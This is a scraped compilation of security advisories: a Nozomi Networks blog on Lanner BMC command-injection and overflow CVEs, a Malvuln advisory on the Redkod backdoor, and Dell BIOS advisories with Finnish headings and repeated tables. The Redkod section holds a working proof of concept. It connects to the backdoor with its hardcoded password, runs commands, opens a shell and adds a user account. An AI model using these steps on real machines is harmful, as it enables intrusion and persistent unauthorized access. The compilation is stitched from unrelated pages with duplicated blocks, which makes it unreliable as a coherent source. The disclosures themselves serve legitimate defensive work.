Multiple command injection vulnerabilities in GL.iNet GoodCloud IoT Device Management System Version 1.00.220412.00 via the ping and traceroute tools allow attackers to read arbitrary files on the system.

CVE-2022-42055: GL.iNET MT300N-V2 Vulnerabilities and Hardware Teardown

Observable discrepancies in the login process allow an attacker to guess legitimate user names registered in the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.

Over the past year, Nozomi Networks Labs has conducted research on the security of Baseboard Management Controllers (BMCs), with a special focus on OT and IoT devices. In part one of this blog series, we reveal thirteen vulnerabilities that affect BMCs of Lanner devices based on the American Megatrends (AMI) MegaRAC SP-X (AMI’s MegaRAC SP-X standard codebase is not affected by those specific issues). By abusing these vulnerabilities, an unauthenticated attacker may achieve Remote Code Execution (RCE) with root privileges on the BMC, completely compromising it and gaining control of the managed host. During our research, we uncovered other vulnerabilities whose patching is still in progress and thus cannot be disclosed as of yet; those will be covered in a follow-up blog post. 

Our discussion starts with an introduction to BMCs and an illustration of the vulnerabilities discovered. We will then provide an example of how an attacker can abuse these issues to ultimately compromise the device, and conclude with remediations that asset owners can implement. 

Nozomi Networks Labs reveals vulnerabilities in BMC firmware affecting OT/IoT devices. 

**Baseboard Management Controllers (BMC) 101**

A Baseboard Management Controller (BMC) is a supplementary System-on-Chip designed for remote monitoring and management of a computer. Due to this dedicated network interface and tight coupling with critical hardware components (e.g. motherboard chipset), BMCs can perform fully remote low-level system operations, such as keyboard-and-mouse interaction straight from the bootstrap, system power control, BIOS firmware reflash, etc. 

In the past, BMCs were only found in IT server motherboards, whereas vendors are now broadening the scope of BMCs to operational technology (OT) and internet of things (IoT) sectors. One such vendor is Lanner Inc., a Taiwanese brand specializing in embedded applications. Notably, during our research, we analyzed Lanner IAC-AST2500A, an expansion card that enables BMC functionalities on Lanner appliances. IAC-AST2500A’s firmware is based on the American Megatrends (AMI) MegaRAC SP-X solution, a popular BMC firmware also utilized by brands such as Asus, Dell, Gigabyte, HP, Lenovo, or nVidia. 

Among the available network services, the expansion card features a web application through which users can fully control the managed host as well as the BMC itself. Figure 1 depicts a screenshot of the interface. 

**Figure 1.** Screenshot of the web interface of the Lanner IAC-AST2500A 

**Vulnerabilities Found **

By analyzing the web interface of the IAC-AST2500A, we found thirteen vulnerabilities, as listed below: 

*   **CVE-2021-26727**: spx\_restservice SubNet\_handler\_func Multiple Command Injections and Stack-Based Buffer Overflows, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26728**: spx\_restservice KillDupUsr\_func Command Injection and Stack-Based Buffer Overflow, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26729**: spx\_restservice Login\_handler\_func Command Injection and Multiple Stack-Based Buffer Overflows, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26730**: spx\_restservice Login\_handler\_func Subfunction Stack-Based Buffer Overflow, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26731**: spx\_restservice modifyUserb\_func Command Injection and Multiple Stack-Based Buffer Overflows, **CVSS v3.1 9.1** (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26732**: spx\_restservice First\_network\_func Broken Access Control, CVSS v3.1 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) 
*   **CVE-2021-26733**: spx\_restservice FirstReset\_handler\_func Broken Access Control, CVSS v3.1 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) 
*   **CVE-2021-44776**: spx\_restservice SubNet\_handler\_func Broken Access Control, CVSS v3.1 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) 
*   **CVE-2021-44467**: spx\_restservice KillDupUsr\_func Broken Access Control, CVSS v3.1 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) 
*   **CVE-2021-44769**: TLS Certificate Generation Function Improper Input Validation, CVSS v3.1 4.9 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H) 
*   **CVE-2021-46279**: Session Fixation and Insufficient Session Expiration, CVSS v3.1 5.8 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L) 
*   **CVE-2021-45925**: Username Enumeration, CVSS v3.1 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) 
*   **CVE-2021-4228**: Hard-coded TLS Certificate, CVSS v3.1 5.8 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L) 

These vulnerabilities affect version 1.10.0 of the standard firmware of Lanner IAC-AST2500, except for CVE-2021-4228 which was found on version 1.00.0. 

**Attack Chain Example: CVE-2021-44467 and CVE-2021-26728 **

CVE-2021-44467 and CVE-2021-26728 describe a possible attack chain whereby an unauthenticated attacker can achieve Remote Code Execution (RCE) with root privileges on the BMC. During the login process, the web application asks through a confirmation dialog if the user wants to terminate any other active session on the logged-in account (Figure 2). 

**Figure 2.** Termination of other active sessions on a logged-in account 

This functionality is implemented via an authenticated POST request to “/api/KillDupUsr”, which is ultimately handled by the “KillDupUsr\_func” function of “spx\_restservice”. This function begins as in Figure 3. 

Figure 3 CVE 2021 44467

Although the POST request contains a QSESSIONID cookie, the function does not perform any verification checks on the user session. This flaw enables unauthenticated attackers to arbitrarily terminate active sessions of other users, causing a Denial-of-Service (DoS) condition (CVE-2021-44467). Further issues can be observed by proceeding with the analysis (Figure 4). 

**Figure 4.** CVE-2021-26728 in KillDupUsr\_func 

At line 41, “strcat” is called to copy the content of “v9”, which contains the value of the externally controllable HTTP parameter “username”, into “dest”, a fixed-size buffer. No checks are done on the length of “v9” before executing the instruction, leading to a stack-based buffer overflow. 

At line 46, a “safe\_system” is called with “dest” as argument. Despite the name, it turned out to be possible to inject arbitrary OS commands in the string (for instance, a subshell command) that were executed by the device, leading to a command injection (CVE-2021-26728). When also considering that all processes run with root privileges on the device, the combined weaknesses enable an unauthenticated attacker to completely compromise both the BMC and the managed host. 

**Remediations  **

After sharing all vulnerabilities with Lanner via a responsible disclosure process, the vendor developed updated BMC firmware versions for the IAC-AST2500A that resolve all issues described in this blog. The correct patched version strictly depends on the appliance in use; thus, we urge Lanner customers to contact technical support to receive the appropriate package. 

If asset owners are unable to patch their appliances, we advise enforcing firewall or network access control rules to restrict the network reachability of the web interface to trusted personnel only, or to actively monitor the network traffic via intrusion detection systems. 

**Summary  **

BMCs represent an attractive way to conveniently monitor and manage computer systems without requiring physical access, in the IT as well as in the OT/IoT domain. Nevertheless, their usability comes at the expense of a broader attack surface, and that may lead to an increase of the overall risk if they are not adequately protected. In this blog, we have presented the first results of our analysis of BMCs in OT and IoT devices and discussed thirteen vulnerabilities, five of which are rated as critical. 

During our assessment, we uncovered further vulnerabilities, that are still in the process of being fixed and will be disclosed at a later date. We recommend that our readers regularly monitor our Nozomi Networks Labs page for the release of the follow-up blogpost, which will describe the remaining issues.

**Related Links:**

*   Vulnerability Details: CVE-2021-26727 
*   Vulnerability Details: CVE-2021-26728 
*   Vulnerability Details: CVE-2021-26729 
*   Vulnerability Details: CVE-2021-26730 
*   Vulnerability Details: CVE-2021-26731 
*   Vulnerability Details: CVE-2021-26732 
*   Vulnerability Details: CVE-2021-26733 
*   Vulnerability Details: CVE-2021-44776 
*   Vulnerability Details: CVE-2021-44467 
*   Vulnerability Details: CVE-2021-44769 
*   Vulnerability Details: CVE-2021-46279 
*   Vulnerability Details: CVE-2021-45925 
*   Vulnerability Details: CVE-2021-4228

CVE-2021-45925: Vulnerabilities in BMC Firmware Affect OT/IoT Device Security – Part 1

Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

**Vaikutus**

High

**Tiedot**

**Third-party Component**

**CVE(s)**

**More Information**

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

2019.2 IPU – Intel® CSME, Intel® SPS, Intel® TXE, Intel® AMT, Intel® PTT and Intel® DAL Advisory

CVE-2019-0169

INTEL-SA-00241

CVE-2019-11147

CVE-2019-11104

CVE-2019-11090

CVE-2019-11087

CVE-2019-11101

2020.1 IPU – Intel® CSME, SPS, TXE, AMT, ISM and DAL Advisory

CVE-2020-0536

INTEL-SA-00295

CVE-2020-0539

CVE-2020-0545

2020.2 IPU – Intel® CSME, SPS, TXE, AMT and DAL Advisory

CVE-2020-8745

  
INTEL-SA-00391

CVE-2020-8705

CVE-2020-12303

CVE-2020-12355

2020.2 IPU – BIOS Advisory

CVE-2020-0587

INTEL-SA-00358

CVE-2020-0591

CVE-2020-0592

CVE-2020-0593

Intel BIOS Platform Sample Code Advisory

CVE-2020-8738

INTEL-SA-00390

CVE-2020-8739

CVE-2020-8740

CVE-2020-8764

2021.1 IPU – Intel® CSME, SPS and LMS Advisory  
 

CVE-2020-24507

INTEL-SA-00459

CVE-2020-8703

2021.1 IPU – BIOS Advisory

CVE-2020-12358

INTEL-SA-00463

CVE-2020-12360

CVE-2020-24486

Intel BSSA DFT Advisory

CVE-2021-0144

INTEL-SA-00525

BIOS Reference Code Advisory

CVE-2021-0157

INTEL-SA-00562

2021.2 IPU - Intel® Processor Breakpoint Control Flow Advisory

CVE-2021-0127

Intel-SA-00532

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

 

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34390

Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-34391

Dell Client BIOS Versions prior to the remediated version contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**Third-party Component**

**CVE(s)**

**More Information**

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

2019.2 IPU – Intel® CSME, Intel® SPS, Intel® TXE, Intel® AMT, Intel® PTT and Intel® DAL Advisory

CVE-2019-0169

INTEL-SA-00241

CVE-2019-11147

CVE-2019-11104

CVE-2019-11090

CVE-2019-11087

CVE-2019-11101

2020.1 IPU – Intel® CSME, SPS, TXE, AMT, ISM and DAL Advisory

CVE-2020-0536

INTEL-SA-00295

CVE-2020-0539

CVE-2020-0545

2020.2 IPU – Intel® CSME, SPS, TXE, AMT and DAL Advisory

CVE-2020-8745

  
INTEL-SA-00391

CVE-2020-8705

CVE-2020-12303

CVE-2020-12355

2020.2 IPU – BIOS Advisory

CVE-2020-0587

INTEL-SA-00358

CVE-2020-0591

CVE-2020-0592

CVE-2020-0593

Intel BIOS Platform Sample Code Advisory

CVE-2020-8738

INTEL-SA-00390

CVE-2020-8739

CVE-2020-8740

CVE-2020-8764

2021.1 IPU – Intel® CSME, SPS and LMS Advisory  
 

CVE-2020-24507

INTEL-SA-00459

CVE-2020-8703

2021.1 IPU – BIOS Advisory

CVE-2020-12358

INTEL-SA-00463

CVE-2020-12360

CVE-2020-24486

Intel BSSA DFT Advisory

CVE-2021-0144

INTEL-SA-00525

BIOS Reference Code Advisory

CVE-2021-0157

INTEL-SA-00562

2021.2 IPU - Intel® Processor Breakpoint Control Flow Advisory

CVE-2021-0127

Intel-SA-00532

Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory

CVE-2019-0086

INTEL-SA-00213

CVE-2019-0091

CVE-2019-0093

 

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34390

Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-34391

Dell Client BIOS Versions prior to the remediated version contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**BIOS Update Version**

**BIOS Release Date**

Alienware Area-51 R4

2.0.6

08/30/2022

Alienware Area-51 R5

2.0.6

08/30/2022

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**BIOS Update Version**

**BIOS Release Date**

Alienware Area-51 R4

2.0.6

08/30/2022

Alienware Area-51 R5

2.0.6

08/30/2022

**Keinoja ongelman kiertämiseen tai lieventämiseen**

None

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022/09/30

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

Dell Technologies would like to thank yngweijw for reporting CVE-2022-34390 and CVE-2022-34391.

30 syysk. 2022

CVE-2022-34390: DSA-2022-269: Dell Client Platform BIOS Security Update for Alienware Area-51 R4/R5

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-32483

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32484

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32485

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32487

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32488

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32489

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32491

Dell BIOS contains a Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause an arbitrary write during SMM.

4.1

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

CVE-2022-32493

Dell BIOS contains a Stack-Based Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

  

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-32483

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32484

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability in order to modify a UEFI variable.

5.6

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L

CVE-2022-32485

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32487

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32488

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32489

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

8.2

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32491

Dell BIOS contains a Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause an arbitrary write during SMM.

4.1

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

CVE-2022-32493

Dell BIOS contains a Stack-Based Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

  

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell recommends all customers update at the earliest opportunity.

Go to the Drivers and Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Keinoja ongelman kiertämiseen tai lieventämiseen**

None

**Kiitokset**

Dell Technologies would like to thank yngweijw for reporting CVE-2022-32483, CVE-2022-32484, CVE-2022-32485, CVE-2022-32487, CVE-2022-32488, CVE-2022-32489, CVE-2022-32491, and CVE-2022-32493.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022/09/29

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

**Product**

**BIOS Update Version**

**BIOS Release Date (MM/DD/YYYY)**

Alienware Area 51m R1

1.21.0

08/08/2022

Alienware Area 51m R2

1.18.0

08/08/2022

Alienware Aurora R10

2.3.1

08/08/2022

Alienware Aurora R11

1.0.16

08/02/2022

Alienware Aurora R12

1.1.16

07/28/2022

Alienware Aurora R13

1.5.0

08/09/2022

Alienware Aurora R8

1.0.23

08/03/2022

Alienware Aurora R9

1.0.20

08/03/2022

Alienware m15 R1

2.14.0

08/09/2022

Alienware m15 R2

1.17.0

08/08/2022

Alienware m15 R3

1.19.0

08/08/2022

Alienware m15 R4

1.13.0

08/08/2022

Alienware m17 R1

2.14.0

08/09/2022

Alienware m17 R2

1.17.0

08/08/2022

Alienware m17 R3

1.19.0

08/08/2022

Alienware m17 R4

1.13.0

08/08/2022

Alienware x14

1.5.0

08/19/2022

Alienware x15 R1

1.11.0

08/08/2022

Alienware x15 R2

1.7.0

08/29/2022

Alienware x17 R1

1.11.0

08/08/2022

Alienware x17 R2

1.7.0

08/29/2022

Aurora R14

2.3.0

08/08/2022

ChengMing 3980

2.24.0

08/09/2022

ChengMing 3988

1.11.0

08/08/2022

ChengMing 3990

1.14.0

08/10/2022

ChengMing 3991

1.14.0

08/10/2022

Dell G3 15 3590

1.18.0

08/09/2022

Dell G3 3579

1.22.0

08/16/2022

Dell G3 3779

1.22.0

08/16/2022

Dell G5 15 5590

1.20.0

08/09/2022

Dell G5 5000

1.10.0

08/08/2022

Dell G5 5090

1.15.0

08/10/2022

Dell G7 17 7590

1.20.0

08/09/2022

Dell G7 17 7790

1.20.0

08/09/2022

Dell Latitude 3480

1.21.0

08/16/2022

Dell Latitude 3580

1.21.0

08/16/2022

Edge Gateway 3000 series

1.9.0

08/09/2022

Edge Gateway 5000

1.19.0

08/09/2022

Embedded Box PC 3000

1.15.0

08/08/2022

Embedded Box PC 5000

1.16.0

08/09/2022

Inspiron 14 3467

2.20.0

08/11/2022

Inspiron 15 3567

2.20.0

08/11/2022

Inspiron 15 5582 2-in-1

2.16.0

08/23/2022

Inspiron 3277

1.21.0

08/09/2022

Inspiron 3280

1.16.0

08/09/2022

Inspiron 3470

2.24.0

08/09/2022

Inspiron 3471

1.11.0

08/08/2022

Inspiron 3477

1.21.0

08/09/2022

Inspiron 3480

1.20.0

08/08/2022

Inspiron 3480

1.16.0

08/09/2022

Inspiron 3481

1.18.0

08/08/2022

Inspiron 3482

1.15.0

08/08/2022

Inspiron 3490

1.20.0

08/08/2022

Inspiron 3493

1.23.0

08/08/2022

Inspiron 3501

1.17.0

08/08/2022

Inspiron 3502

1.9.0

08/08/2022

Inspiron 3580

1.20.0

08/08/2022

Inspiron 3580

1.20.0

08/08/2022

Inspiron 3581

1.18.0

08/08/2022

Inspiron 3581

1.18.0

08/08/2022

Inspiron 3582

1.15.0

08/08/2022

Inspiron 3590

1.20.0

08/08/2022

Inspiron 3593

1.23.0

08/08/2022

Inspiron 3670

2.24.0

08/09/2022

Inspiron 3671

1.11.0

08/08/2022

Inspiron 3780

1.20.0

08/08/2022

Inspiron 3781

1.18.0

08/08/2022

Inspiron 3782

1.15.0

08/08/2022

Inspiron 3790

1.20.0

08/08/2022

Inspiron 3793

1.23.0

08/08/2022

Inspiron 3880

1.14.0

08/10/2022

Inspiron 3881

1.14.0

08/10/2022

Inspiron 5390

1.18.0

08/05/2022

Inspiron 5391

1.19.0

08/09/2022

Inspiron 5400

1.13.0

08/02/2022

Inspiron 5401 All-In-One

1.13.0

08/02/2022

Inspiron 5477

1.2.20

